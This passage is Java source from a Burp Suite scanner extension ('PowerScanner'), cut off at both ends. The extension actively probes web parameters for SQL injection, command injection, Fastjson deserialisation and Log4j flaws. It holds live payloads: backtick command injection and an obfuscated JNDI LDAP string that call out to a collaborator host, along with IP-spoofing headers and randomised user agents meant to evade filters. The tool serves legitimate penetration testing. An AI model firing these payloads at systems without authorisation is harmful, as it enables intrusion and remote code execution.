\"%s\":[[{\"@type\":\"java.net.Inet4Address\",\"val\":\"%s.%s\"}]]} ", Utils.getRandomString(3), sig, collaboratorPayload); 33 | byte[] reqEvil = insertionPoint.buildRequest((payload).getBytes()); 34 | IHttpRequestResponse pairEvil = callbacks.makeHttpRequest( 35 | baseRequestResponse.getHttpService(), 36 | reqEvil 37 | ); 38 | pairEvil.setComment(payload); 39 | FetchCollaboratorWithSig fetch = new FetchCollaboratorWithSig(reporter( 40 | "Fastjson vulnerability found", 41 | String.format("param: %s
" + 42 | "InsertionPointType: %s
" + 43 | "Payload: %s" 44 | , 45 | baseName, 46 | insertionPointType, 47 | payload 48 | ), 49 | "High", 50 | "Certain", 51 | pairEvil 52 | ), 53 | collaboratorPayload, 54 | sig, 55 | callbacks, 56 | helpers, 57 | collaboratorContext 58 | ); 59 | fetch.start(); 60 | } 61 | } 62 | return null; 63 | } 64 | } 65 | -------------------------------------------------------------------------------- /src/main/java/BrianW/AKA/BigChan/PowerScanner/ScanSqli.java: -------------------------------------------------------------------------------- 1 | package BrianW.AKA.BigChan.PowerScanner; 2 | 3 | import BrianW.AKA.BigChan.Tools.HitRst; 4 | import BrianW.AKA.BigChan.Tools.Utils; 5 | import burp.*; 6 | 7 | public class ScanSqli extends Reporter { 8 | protected IBurpExtenderCallbacks callbacks; 9 | protected IExtensionHelpers helpers; 10 | public ScanSqli(IBurpExtenderCallbacks callbacks, IExtensionHelpers helpers) { 11 | super(callbacks, helpers); 12 | this.callbacks = callbacks; 13 | this.helpers = helpers; 14 | } 15 | //@todo where sort order limit table from start end 16 | public IScanIssue doScanSqli(IHttpRequestResponse baseRequestResponse, IScannerInsertionPoint insertionPoint) { 17 | byte[] resp = baseRequestResponse.getResponse(); 18 | String baseName = insertionPoint.getInsertionPointName(); 19 | String InsertionPointType = Utils.bytesToHexString(new byte[]{insertionPoint.getInsertionPointType()}, 1); 20 | String baseValue = insertionPoint.getBaseValue(); 21 | String testStr = ""; 22 | String evilStr = ""; 23 | // callbacks.printOutput("baseName=" + baseName + ", baseValue=" + baseValue); 24 | String baseType = baseValue.matches("[0-9]+") ? "int" : "string"; 25 | // if (baseValue.matches("[0-9]+") && baseName.length()<5 && baseName.contains("id")){ 26 | if ("int".equals(baseType)) { 27 | testStr = "/1"; 28 | evilStr = "/0"; 29 | } else { 30 | testStr = "''"; 31 | evilStr = "'"; 32 | } 33 | 34 | byte[] reqTest = insertionPoint.buildRequest((baseValue + testStr).getBytes()); 35 | IHttpRequestResponse pairTrue = callbacks.makeHttpRequest( 36 | baseRequestResponse.getHttpService(), 37 | reqTest 38 | ); 39 | byte[] respTrue = pairTrue.getResponse(); 40 | 41 | byte[] reqEvil = insertionPoint.buildRequest((baseValue + evilStr).getBytes()); 42 | IHttpRequestResponse pairEvil = callbacks.makeHttpRequest( 43 | baseRequestResponse.getHttpService(), 44 | reqEvil 45 | ); 46 | byte[] respEvil = pairEvil.getResponse(); 47 | HitRst hit = hit(resp, respTrue, respEvil, testStr, evilStr); 48 | if (hit.getCdoe() > 0) { 49 | // callbacks.printOutput("injection found in param: " + baseName + " with type " + baseType + " ;InsertionPointType:" + InsertionPointType); 50 | return reporter( 51 | "injection(might be SQLi) found", 52 | String.format("param: %s
" + 53 | "type: %s
" + 54 | "InsertionPointType: %s
" + 55 | "HitCode: %s

" + 56 | "The same between base response and negative response:
%s
" + 57 | "The difference between base response and negative response:
%s
" + 58 | "The same between base response and positive response:
%s
" + 59 | "The difference between base response and positive response:
%s
" 60 | , 61 | baseName, 62 | baseType, 63 | InsertionPointType, 64 | hit.getCdoe(), 65 | hit.getCompareWithNegative_Same(), 66 | hit.getCompareWithNegative_Diff(), 67 | hit.getCompareWithPositive_Same(), 68 | hit.getCompareWithPositive_Diff() 69 | ), 70 | "High", 71 | "Firm", 72 | baseRequestResponse, 73 | pairTrue, 74 | pairEvil 75 | ); 76 | } 77 | return null; 78 | } 79 | 80 | 81 | } 82 | -------------------------------------------------------------------------------- /src/main/java/burp/IHttpRequestResponse.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IHttpRequestResponse.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * This interface is used to retrieve and update details about HTTP messages. 14 | * 15 | * Note: The setter methods generally can only be used before the message 16 | * has been processed, and not in read-only contexts. The getter methods 17 | * relating to response details can only be used after the request has been 18 | * issued. 19 | */ 20 | public interface IHttpRequestResponse 21 | { 22 | /** 23 | * This method is used to retrieve the request message. 24 | * 25 | * @return The request message. 26 | */ 27 | byte[] getRequest(); 28 | 29 | /** 30 | * This method is used to update the request message. 31 | * 32 | * @param message The new request message. 33 | */ 34 | void setRequest(byte[] message); 35 | 36 | /** 37 | * This method is used to retrieve the response message. 38 | * 39 | * @return The response message. 40 | */ 41 | byte[] getResponse(); 42 | 43 | /** 44 | * This method is used to update the response message. 45 | * 46 | * @param message The new response message. 47 | */ 48 | void setResponse(byte[] message); 49 | 50 | /** 51 | * This method is used to retrieve the user-annotated comment for this item, 52 | * if applicable. 53 | * 54 | * @return The user-annotated comment for this item, or null if none is set. 55 | */ 56 | String getComment(); 57 | 58 | /** 59 | * This method is used to update the user-annotated comment for this item. 60 | * 61 | * @param comment The comment to be assigned to this item. 62 | */ 63 | void setComment(String comment); 64 | 65 | /** 66 | * This method is used to retrieve the user-annotated highlight for this 67 | * item, if applicable. 68 | * 69 | * @return The user-annotated highlight for this item, or null if none is 70 | * set. 71 | */ 72 | String getHighlight(); 73 | 74 | /** 75 | * This method is used to update the user-annotated highlight for this item. 76 | * 77 | * @param color The highlight color to be assigned to this item. Accepted 78 | * values are: red, orange, yellow, green, cyan, blue, pink, magenta, gray, 79 | * or a null String to clear any existing highlight. 80 | */ 81 | void setHighlight(String color); 82 | 83 | /** 84 | * This method is used to retrieve the HTTP service for this request / 85 | * response. 86 | * 87 | * @return An 88 | * IHttpService object containing details of the HTTP service. 89 | */ 90 | IHttpService getHttpService(); 91 | 92 | /** 93 | * This method is used to update the HTTP service for this request / 94 | * response. 95 | * 96 | * @param httpService An 97 | * IHttpService object containing details of the new HTTP 98 | * service. 99 | */ 100 | void setHttpService(IHttpService httpService); 101 | 102 | } 103 | -------------------------------------------------------------------------------- /src/main/java/burp/IParameter.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IParameter.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * This interface is used to hold details about an HTTP request parameter. 14 | */ 15 | public interface IParameter 16 | { 17 | /** 18 | * Used to indicate a parameter within the URL query string. 19 | */ 20 | byte PARAM_URL = 0; 21 | /** 22 | * Used to indicate a parameter within the message body. 23 | */ 24 | byte PARAM_BODY = 1; 25 | /** 26 | * Used to indicate an HTTP cookie. 27 | */ 28 | byte PARAM_COOKIE = 2; 29 | /** 30 | * Used to indicate an item of data within an XML structure. 31 | */ 32 | byte PARAM_XML = 3; 33 | /** 34 | * Used to indicate the value of a tag attribute within an XML structure. 35 | */ 36 | byte PARAM_XML_ATTR = 4; 37 | /** 38 | * Used to indicate the value of a parameter attribute within a multi-part 39 | * message body (such as the name of an uploaded file). 40 | */ 41 | byte PARAM_MULTIPART_ATTR = 5; 42 | /** 43 | * Used to indicate an item of data within a JSON structure. 44 | */ 45 | byte PARAM_JSON = 6; 46 | 47 | /** 48 | * This method is used to retrieve the parameter type. 49 | * 50 | * @return The parameter type. The available types are defined within this 51 | * interface. 52 | */ 53 | byte getType(); 54 | 55 | /** 56 | * This method is used to retrieve the parameter name. 57 | * 58 | * @return The parameter name. 59 | */ 60 | String getName(); 61 | 62 | /** 63 | * This method is used to retrieve the parameter value. 64 | * 65 | * @return The parameter value. 66 | */ 67 | String getValue(); 68 | 69 | /** 70 | * This method is used to retrieve the start offset of the parameter name 71 | * within the HTTP request. 72 | * 73 | * @return The start offset of the parameter name within the HTTP request, 74 | * or -1 if the parameter is not associated with a specific request. 75 | */ 76 | int getNameStart(); 77 | 78 | /** 79 | * This method is used to retrieve the end offset of the parameter name 80 | * within the HTTP request. 81 | * 82 | * @return The end offset of the parameter name within the HTTP request, or 83 | * -1 if the parameter is not associated with a specific request. 84 | */ 85 | int getNameEnd(); 86 | 87 | /** 88 | * This method is used to retrieve the start offset of the parameter value 89 | * within the HTTP request. 90 | * 91 | * @return The start offset of the parameter value within the HTTP request, 92 | * or -1 if the parameter is not associated with a specific request. 93 | */ 94 | int getValueStart(); 95 | 96 | /** 97 | * This method is used to retrieve the end offset of the parameter value 98 | * within the HTTP request. 99 | * 100 | * @return The end offset of the parameter value within the HTTP request, or 101 | * -1 if the parameter is not associated with a specific request. 102 | */ 103 | int getValueEnd(); 104 | } 105 | -------------------------------------------------------------------------------- /src/main/java/BrianW/AKA/BigChan/PowerScanner/ScanRCE.java: -------------------------------------------------------------------------------- 1 | package BrianW.AKA.BigChan.PowerScanner; 2 | 3 | import BrianW.AKA.BigChan.Tools.FetchCollaboratorWithSig; 4 | import BrianW.AKA.BigChan.Tools.Global; 5 | import BrianW.AKA.BigChan.Tools.Utils; 6 | import burp.*; 7 | 8 | import java.util.ArrayList; 9 | import java.util.List; 10 | 11 | import static java.lang.Thread.sleep; 12 | 13 | 14 | public class ScanRCE extends Reporter { 15 | protected IBurpExtenderCallbacks callbacks; 16 | protected IExtensionHelpers helpers; 17 | // private IBurpCollaboratorClientContext collaboratorContext; 18 | // private InteractionServer interactionServer; 19 | private List RCEpayloads = new ArrayList() {{ 20 | //add("|{cmd}|"); 21 | add("`{cmd}`"); 22 | //add(";{cmd};"); 23 | }}; 24 | 25 | public ScanRCE(IBurpExtenderCallbacks callbacks, IExtensionHelpers helpers) { 26 | super(callbacks, helpers); 27 | this.callbacks = callbacks; 28 | this.helpers = helpers; 29 | } 30 | 31 | public IScanIssue doScanRCE(IHttpRequestResponse baseRequestResponse, IScannerInsertionPoint insertionPoint) { 32 | byte[] resp = baseRequestResponse.getResponse(); 33 | String baseName = insertionPoint.getInsertionPointName(); 34 | String insertionPointType = Utils.bytesToHexString(new byte[]{insertionPoint.getInsertionPointType()}, 1); 35 | String baseValue = insertionPoint.getBaseValue(); 36 | // InteractionServer interactionServer = new InteractionServer(); 37 | 38 | for (String RCEpayload : RCEpayloads) { 39 | IBurpCollaboratorClientContext collaboratorContext = this.callbacks.createBurpCollaboratorClientContext(); 40 | String collaboratorPayload = collaboratorContext.generatePayload(true); 41 | callbacks.printOutput("generate RCE collaboratorPayload: " + collaboratorPayload); 42 | String sig = Utils.getRandomString(3).toLowerCase(); 43 | String cmd = String.format("%s %s.%s", Global.config.getConfigRCEcmd_value(), sig, collaboratorPayload); 44 | String payload = RCEpayload.replace("{cmd}", cmd); 45 | byte[] reqEvil = insertionPoint.buildRequest((payload).getBytes()); 46 | IHttpRequestResponse pairEvil = callbacks.makeHttpRequest( 47 | baseRequestResponse.getHttpService(), 48 | reqEvil 49 | ); 50 | pairEvil.setComment(payload); 51 | FetchCollaboratorWithSig fetch = new FetchCollaboratorWithSig( 52 | reporter( 53 | "injection(might be RCE) found", 54 | String.format("param: %s
" + 55 | "InsertionPointType: %s
" + 56 | "Payload: %s" 57 | , 58 | baseName, 59 | insertionPointType, 60 | payload 61 | ), 62 | "High", 63 | "Certain", 64 | pairEvil 65 | ), 66 | collaboratorPayload, 67 | sig, 68 | callbacks, 69 | helpers, 70 | collaboratorContext 71 | ); 72 | fetch.start(); 73 | } 74 | return null; 75 | } 76 | } 77 | -------------------------------------------------------------------------------- /src/main/java/BrianW/AKA/BigChan/Handlers/RequestHandler.java: -------------------------------------------------------------------------------- 1 | package BrianW.AKA.BigChan.Handlers; 2 | 3 | import BrianW.AKA.BigChan.Tools.Global; 4 | import BrianW.AKA.BigChan.Tools.SendToProxy; 5 | import burp.*; 6 | import org.apache.http.HttpHost; 7 | 8 | import java.net.InetSocketAddress; 9 | import java.net.Proxy; 10 | import java.net.URL; 11 | import java.util.Arrays; 12 | import java.util.List; 13 | 14 | public class RequestHandler implements IProxyListener{ 15 | protected IBurpExtenderCallbacks callbacks; 16 | protected IExtensionHelpers helpers; 17 | public void IProxyListener(IBurpExtenderCallbacks callbacks, IExtensionHelpers helpers) { 18 | this.callbacks = callbacks; 19 | this.helpers = helpers; 20 | } 21 | 22 | public RequestHandler(IBurpExtenderCallbacks callbacks, IExtensionHelpers helpers) { 23 | this.callbacks = callbacks; 24 | this.helpers = helpers; 25 | } 26 | 27 | @Override 28 | public void processProxyMessage(boolean messageIsRequest, IInterceptedProxyMessage message) { 29 | if (messageIsRequest && Global.config.getConfigRequestRouteEnable_value()){ 30 | String[] proxyList = Global.config.getConfigRequestRoute_value().split("\\r?\\n"); 31 | for (String proxyStr : proxyList) { 32 | String user = ""; 33 | String pass = ""; 34 | if (proxyStr.contains("@")){ 35 | String acc = proxyStr.split("@")[0]; 36 | if (acc.contains(":")){ 37 | user = acc.split(":")[0]; 38 | pass = acc.split(":")[1]; 39 | proxyStr = proxyStr.split("@")[1]; 40 | } 41 | } 42 | HttpHost proxy = new HttpHost(proxyStr.split(":")[0], Integer.parseInt(proxyStr.split(":")[1])); 43 | byte[] currentRequest = message.getMessageInfo().getRequest(); 44 | IHttpService service = message.getMessageInfo().getHttpService(); 45 | String host = service.getHost(); 46 | int port = message.getMessageInfo().getHttpService().getPort(); 47 | String protocol = message.getMessageInfo().getHttpService().getProtocol(); 48 | String method = this.helpers.analyzeRequest(message.getMessageInfo()).getMethod(); 49 | URL url = this.helpers.analyzeRequest(message.getMessageInfo()).getUrl(); 50 | List parameters = this.helpers.analyzeRequest(message.getMessageInfo()).getParameters(); 51 | List headers = this.helpers.analyzeRequest(message.getMessageInfo()).getHeaders(); 52 | int bodySize = currentRequest.length - this.helpers.analyzeRequest(currentRequest).getBodyOffset(); 53 | byte[] reqBody = new byte[bodySize]; 54 | System.arraycopy(currentRequest, this.helpers.analyzeRequest(currentRequest).getBodyOffset(), reqBody, 0, bodySize); 55 | callbacks.printOutput(headers.get(0)); 56 | // callbacks.printOutput(String.format("body size=%s, body = %s", bodySize, Arrays.toString(reqBody))); 57 | byte[] bytes = new byte[0]; 58 | // SendToProxy sendToProxy = new SendToProxy(url, method, headers, reqBody, proxy, user, pass); 59 | // sendToProxy.run(); 60 | Thread sendToProxy = new Thread(new SendToProxy(url, method, headers, reqBody, proxy, user, pass)); 61 | sendToProxy.start(); 62 | } 63 | } 64 | } 65 | } 66 | -------------------------------------------------------------------------------- /src/main/java/BrianW/AKA/BigChan/PowerScanner/ScanSensitiveInfo.java: -------------------------------------------------------------------------------- 1 | package BrianW.AKA.BigChan.PowerScanner; 2 | 3 | import burp.*; 4 | 5 | import java.util.ArrayList; 6 | import java.util.List; 7 | import java.util.regex.Matcher; 8 | import java.util.regex.Pattern; 9 | 10 | public class ScanSensitiveInfo extends Reporter { 11 | protected IBurpExtenderCallbacks callbacks; 12 | protected IExtensionHelpers helpers; 13 | protected String[] sensitiveWords = new String[]{ 14 | "博彩", "赌博", "太阳城", "bet365", 15 | }; 16 | 17 | public ScanSensitiveInfo(IBurpExtenderCallbacks callbacks, IExtensionHelpers helpers) { 18 | super(callbacks, helpers); 19 | this.callbacks = callbacks; 20 | this.helpers = helpers; 21 | } 22 | 23 | public List doScanSensitiveInfo(IHttpRequestResponse baseRequestResponse) { 24 | 25 | List issues = new ArrayList<>(); 26 | IResponseInfo responseInfo = helpers.analyzeResponse(baseRequestResponse.getResponse()); 27 | String mimeType = responseInfo.getStatedMimeType(); 28 | String inferredMimeType = responseInfo.getInferredMimeType(); 29 | callbacks.printOutput("doScanSensitiveInfo: mimeType=" + mimeType); 30 | callbacks.printOutput("doScanSensitiveInfo: inferredMimeType=" + inferredMimeType); 31 | String content = callbacks.getHelpers().bytesToString(baseRequestResponse.getResponse()); 32 | if (mimeType.contains("HTML")){ 33 | callbacks.printOutput("doScanSensitiveInfo: " + mimeType); 34 | Matcher matchID = searchID(content); 35 | if (matchID.find()){ 36 | callbacks.printOutput("doScanSensitiveInfo: matchID" ); 37 | issues.add( 38 | reporter( 39 | "Sensitive Information found (ID)", 40 | String.format("Found Sensitive Information: IDs
" + 41 | "IDs: %s
", 42 | matchToString(matchID) 43 | ), 44 | "Medium", 45 | "Certain" 46 | ) 47 | ); 48 | } 49 | } 50 | 51 | return issues; 52 | } 53 | 54 | //敏感字 55 | private String searchSensitiveWords(String param) { 56 | for (String word : sensitiveWords) { 57 | if (param.toLowerCase().contains(word)) { 58 | return word; 59 | } 60 | } 61 | return ""; 62 | } 63 | //身份证信息泄露 64 | private Matcher searchID(String content) { 65 | String pattern = "(^[1-9]\\d{5}(18|19|20)\\d{2}((0[1-9])|(10|11|12))(([0-2][1-9])|10|20|30|31)\\d{3}[0-9Xx]$)|(^[1-9]\\d{5}\\d{2}((0[1-9])|(10|11|12))(([0-2][1-9])|10|20|30|31)\\d{3}$)"; 66 | Pattern r = Pattern.compile(pattern); 67 | return r.matcher(content); 68 | } 69 | 70 | private Matcher searchMobile(String content) { 71 | String pattern = "((\\+86|0086)?\\s*)((134[0-8]\\d{7})|(((13([0-3]|[5-9]))|(14[5-9])|15([0-3]|[5-9])|(16(2|[5-7]))|17([0-3]|[5-8])|18[0-9]|19(1|[8-9]))\\d{8})|(14(0|1|4)0\\d{7})|(1740([0-5]|[6-9]|[10-12])\\d{7}))"; 72 | Pattern r = Pattern.compile(pattern); 73 | return r.matcher(content); 74 | } 75 | 76 | private String matchToString(Matcher m){ 77 | String rst = ""; 78 | for (int i=0; i< m.groupCount(); i++){ 79 | rst += m.group(i) + "
"; 80 | } 81 | return rst; 82 | } 83 | } -------------------------------------------------------------------------------- /src/main/java/BrianW/AKA/BigChan/Handlers/PerRequestHandler.java: -------------------------------------------------------------------------------- 1 | package BrianW.AKA.BigChan.Handlers; 2 | 3 | import BrianW.AKA.BigChan.PowerScanner.*; 4 | import BrianW.AKA.BigChan.Tools.Global; 5 | import burp.*; 6 | 7 | import java.util.ArrayList; 8 | import java.util.List; 9 | 10 | public class PerRequestHandler implements IScannerCheck { 11 | private final IBurpExtenderCallbacks callbacks; 12 | private final IExtensionHelpers helpers; 13 | 14 | public PerRequestHandler(IBurpExtenderCallbacks callbacks, IExtensionHelpers helpers) { 15 | this.callbacks = callbacks; 16 | this.helpers = helpers; 17 | } 18 | 19 | @Override 20 | public List doPassiveScan(IHttpRequestResponse baseRequestResponse) { 21 | List issues = new ArrayList<>(); 22 | if (Global.config.getConfigSensitiveParamEnable_value()) { 23 | issues.addAll( 24 | new ScanSensitiveParam(callbacks, helpers).doScanSensitiveParam(baseRequestResponse) 25 | ); 26 | } 27 | // issues.addAll( 28 | // new ScanSensitiveInfo(callbacks, helpers).doScanSensitiveInfo(baseRequestResponse) 29 | // ); 30 | List nullList = new ArrayList(); 31 | nullList.add(null); 32 | issues.removeAll(nullList); 33 | return issues; 34 | } 35 | 36 | @Override 37 | public List doActiveScan(IHttpRequestResponse baseRequestResponse, IScannerInsertionPoint insertionPoint) { 38 | // report the issue 39 | List issues = new ArrayList<>(); 40 | if (Global.config.getConfigSqliEnable_value()) { 41 | issues.add( 42 | new ScanSqli(callbacks, helpers).doScanSqli(baseRequestResponse, insertionPoint) 43 | ); 44 | } 45 | if (Global.config.getConfigRCEEnable_value()) { 46 | issues.add( 47 | new ScanRCE(callbacks, helpers).doScanRCE(baseRequestResponse, insertionPoint) 48 | ); 49 | } 50 | if (Global.config.getConfigPathTraversalEnable_value()) { 51 | issues.add( 52 | new ScanPathTraversal(callbacks, helpers).doScanPathTraversal(baseRequestResponse, insertionPoint) 53 | ); 54 | } 55 | if (Global.config.getConfigFastjsonEnable_value()) { 56 | issues.add( 57 | new ScanFastJson(callbacks, helpers).doScanFastJson(baseRequestResponse, insertionPoint) 58 | ); 59 | } 60 | if (Global.config.getConfigLog4jEnable_value()) { 61 | issues.add( 62 | new ScanLog4j(callbacks, helpers).doScanLog4j(baseRequestResponse, insertionPoint) 63 | ); 64 | } 65 | List nullList = new ArrayList(); 66 | nullList.add(null); 67 | issues.removeAll(nullList); 68 | return issues; 69 | } 70 | 71 | @Override 72 | public int consolidateDuplicateIssues(IScanIssue existingIssue, IScanIssue newIssue) { 73 | return 0; 74 | } 75 | 76 | // helper method to search a response for occurrences of a literal match string 77 | // and return a list of start/end offsets 78 | private List getMatches(byte[] response, byte[] match) { 79 | List matches = new ArrayList(); 80 | 81 | int start = 0; 82 | while (start < response.length) { 83 | start = helpers.indexOf(response, match, true, start, response.length); 84 | if (start == -1) { 85 | break; 86 | } 87 | matches.add(new int[]{start, start + match.length}); 88 | start += match.length; 89 | } 90 | 91 | return matches; 92 | } 93 | } 94 | 95 | -------------------------------------------------------------------------------- /src/main/java/BrianW/AKA/BigChan/Handlers/SessionHandler.java: -------------------------------------------------------------------------------- 1 | package BrianW.AKA.BigChan.Handlers; 2 | 3 | import BrianW.AKA.BigChan.Tools.Global; 4 | import BrianW.AKA.BigChan.Tools.Utils; 5 | import burp.*; 6 | 7 | import java.nio.charset.StandardCharsets; 8 | import java.util.List; 9 | 10 | public class SessionHandler implements ISessionHandlingAction { 11 | protected IBurpExtenderCallbacks callbacks; 12 | protected IExtensionHelpers helpers; 13 | 14 | public SessionHandler(IBurpExtenderCallbacks callbacks, IExtensionHelpers helpers) { 15 | this.callbacks = callbacks; 16 | this.helpers = helpers; 17 | } 18 | 19 | @Override 20 | public String getActionName() 21 | { 22 | return "PowerScanner"; 23 | } 24 | 25 | @Override 26 | public void performAction( 27 | IHttpRequestResponse currentRequest, 28 | IHttpRequestResponse[] macroItems) 29 | { 30 | String randomIP = Utils.IpGen(); 31 | byte[] newRequest = new byte[]{}; 32 | String request = helpers.bytesToString(currentRequest.getRequest()); 33 | IRequestInfo requestInfo = helpers.analyzeRequest(currentRequest); 34 | List headers = requestInfo.getHeaders(); 35 | int bodySize = currentRequest.getRequest().length - requestInfo.getBodyOffset(); 36 | byte[] reqBody = new byte[bodySize]; 37 | // callbacks.printOutput("currentRequest.getRequest().length=" + currentRequest.getRequest().length); 38 | // callbacks.printOutput("requestInfo.getBodyOffset()" + requestInfo.getBodyOffset()); 39 | System.arraycopy(currentRequest.getRequest(), requestInfo.getBodyOffset(), reqBody, 0, bodySize); 40 | if (Global.config.getConfigRandomIPEnable_value()) { 41 | headers.removeIf(n -> (n.startsWith("x-originating-IP: "))); 42 | headers.removeIf(n -> (n.startsWith("x-forwarded-for: "))); 43 | headers.removeIf(n -> (n.startsWith("x-remote-IP: "))); 44 | headers.removeIf(n -> (n.startsWith("x-remote-addr: "))); 45 | headers.removeIf(n -> (n.startsWith("X-Client-IP: "))); 46 | headers.add("x-originating-IP: " + randomIP); 47 | headers.add("x-forwarded-for: " + randomIP); 48 | headers.add("x-remote-IP: " + randomIP); 49 | headers.add("x-remote-addr: " + randomIP); 50 | headers.add("X-Client-IP: " + randomIP); 51 | } 52 | if (Global.config.getConfigClearCookieEnable_value()) { 53 | headers.removeIf(n -> (n.startsWith("Cookie: "))); 54 | headers.add("Cookie: "); 55 | } 56 | if (Global.config.getConfigRandomUAEnable_value()) { 57 | headers.removeIf(n -> (n.startsWith("User-Agent: "))); 58 | headers.add(String.format("User-Agent: %s/%d.0 (Windows NT %d.0; Win%d; x64) AppleWebKit/%d (%s, like %s) %s/%d.0.%d.%d %s/%d.%d", 59 | Utils.getRandomString(7), 60 | Utils.getRandomInt(20, 1), 61 | Utils.getRandomInt(20, 1), 62 | Utils.getRandomInt(100, 1), 63 | Utils.getRandomInt(1000, 1), 64 | Utils.getRandomString(5), 65 | Utils.getRandomString(5), 66 | Utils.getRandomString(6), 67 | Utils.getRandomInt(100, 1), 68 | Utils.getRandomInt(100, 1), 69 | Utils.getRandomInt(100, 1), 70 | Utils.getRandomString(6), 71 | Utils.getRandomInt(1000, 1), 72 | Utils.getRandomInt(1000, 1) 73 | )); 74 | } 75 | if (Global.config.getConfigRandomHostEnable_value()) { 76 | headers.removeIf(n -> (n.startsWith("Host: "))); 77 | headers.add("Host: " + currentRequest.getHttpService().getHost() + ".:" + Utils.getRandomInt(65535, 1)); 78 | } 79 | String reqBodyStr = helpers.bytesToString(reqBody); 80 | if (Global.config.getConfigJson2UnicodeEnable_value()) { 81 | if (Utils.isJson(reqBodyStr)){ 82 | reqBody = Utils.encodeJson2Unicode(reqBodyStr).getBytes(StandardCharsets.UTF_8); 83 | } 84 | } 85 | newRequest = helpers.buildHttpMessage(headers, reqBody); 86 | currentRequest.setRequest(newRequest); 87 | } 88 | } 89 | -------------------------------------------------------------------------------- /src/main/java/BrianW/AKA/BigChan/PowerScanner/ScanLog4j.java: -------------------------------------------------------------------------------- 1 | package BrianW.AKA.BigChan.PowerScanner; 2 | 3 | import BrianW.AKA.BigChan.Tools.FetchCollaboratorWithSig; 4 | import BrianW.AKA.BigChan.Tools.Utils; 5 | import burp.*; 6 | 7 | import static java.lang.Thread.sleep; 8 | 9 | public class ScanLog4j extends Reporter { 10 | protected IBurpExtenderCallbacks callbacks; 11 | protected IExtensionHelpers helpers; 12 | 13 | public ScanLog4j(IBurpExtenderCallbacks callbacks, IExtensionHelpers helpers) { 14 | super(callbacks, helpers); 15 | this.callbacks = callbacks; 16 | this.helpers = helpers; 17 | } 18 | 19 | public IScanIssue doScanLog4j(IHttpRequestResponse baseRequestResponse, IScannerInsertionPoint insertionPoint) { 20 | byte[] resp = baseRequestResponse.getResponse(); 21 | byte[] req = baseRequestResponse.getRequest(); 22 | String baseName = insertionPoint.getInsertionPointName(); 23 | byte insertionPointType = insertionPoint.getInsertionPointType(); 24 | String baseValue = insertionPoint.getBaseValue(); 25 | IBurpCollaboratorClientContext collaboratorContext = this.callbacks.createBurpCollaboratorClientContext(); 26 | String collaboratorPayload = collaboratorContext.generatePayload(true); 27 | String sig = Utils.getRandomString(3).toLowerCase(); 28 | String payload = genLog4jPayload(collaboratorPayload, sig); 29 | // callbacks.printOutput(String.format("generate log4j2 RCE collaboratorPayload: %s.%s, final payload: %s", sig, collaboratorPayload, payload)); 30 | byte[] reqEvil = insertionPoint.buildRequest((payload).getBytes()); 31 | IHttpRequestResponse pairEvil = callbacks.makeHttpRequest( 32 | baseRequestResponse.getHttpService(), 33 | reqEvil 34 | ); 35 | pairEvil.setComment(payload); 36 | FetchCollaboratorWithSig fetch = new FetchCollaboratorWithSig(reporter( 37 | "log4j RCE vulnerability found", 38 | String.format("param: %s
" + 39 | "InsertionPointType: %s
" + 40 | "Payload: %s" 41 | , 42 | baseName, 43 | insertionPointType, 44 | collaboratorPayload 45 | ), 46 | "High", 47 | "Certain", 48 | pairEvil 49 | ), 50 | collaboratorPayload, 51 | sig, 52 | callbacks, 53 | helpers, 54 | collaboratorContext 55 | ); 56 | fetch.start(); 57 | return null; 58 | } 59 | 60 | private static String genLog4jPayload(String dns, String sig) { 61 | return String.format("%s${%s.%s:1344/%s}%s", Utils.getRandomString(4), obfuscator("jndi:ldap://" + sig), obfuscator(dns),Utils.getRandomString(4), Utils.getRandomString(4)); 62 | } 63 | 64 | private static String obfuscator(String payload) { 65 | StringBuilder finalString = new StringBuilder(); 66 | for (char chr : payload.toCharArray()) { 67 | String str = String.format("${date:'%s'}", chr); 68 | finalString.append(str); 69 | } 70 | return finalString.toString(); 71 | } 72 | public static void main(String[] args) throws Exception { 73 | String collaboratorPayload = "oe6xdsw7z2mstx2a0sutyu60erkh86.nl.chromdnssrv.com"; 74 | String sig = Utils.getRandomString(3).toLowerCase(); 75 | String payload = genLog4jPayload(collaboratorPayload, sig); 76 | System.out.printf("generate log4j2 RCE collaboratorPayload: %s.%s, final payload: %s%n", sig, collaboratorPayload, payload); 77 | } 78 | } 79 | -------------------------------------------------------------------------------- /src/main/java/burp/IScannerCheck.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IScannerCheck.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.util.List; 13 | 14 | /** 15 | * Extensions can implement this interface and then call 16 | * IBurpExtenderCallbacks.registerScannerCheck() to register a 17 | * custom Scanner check. When performing scanning, Burp will ask the check to 18 | * perform active or passive scanning on the base request, and report any 19 | * Scanner issues that are identified. 20 | */ 21 | public interface IScannerCheck 22 | { 23 | 24 | /** 25 | * The Scanner invokes this method for each base request / response that is 26 | * passively scanned. Note: Extensions should only analyze the 27 | * HTTP messages provided during passive scanning, and should not make any 28 | * new HTTP requests of their own. 29 | * 30 | * @param baseRequestResponse The base HTTP request / response that should 31 | * be passively scanned. 32 | * @return A list of IScanIssue objects, or null 33 | * if no issues are identified. 34 | */ 35 | List doPassiveScan(IHttpRequestResponse baseRequestResponse); 36 | 37 | /** 38 | * The Scanner invokes this method for each insertion point that is actively 39 | * scanned. Extensions may issue HTTP requests as required to carry out 40 | * active scanning, and should use the 41 | * IScannerInsertionPoint object provided to build scan 42 | * requests for particular payloads. 43 | * Note: 44 | * Scan checks should submit raw non-encoded payloads to insertion points, 45 | * and the insertion point has responsibility for performing any data 46 | * encoding that is necessary given the nature and location of the insertion 47 | * point. 48 | * 49 | * @param baseRequestResponse The base HTTP request / response that should 50 | * be actively scanned. 51 | * @param insertionPoint An IScannerInsertionPoint object that 52 | * can be queried to obtain details of the insertion point being tested, and 53 | * can 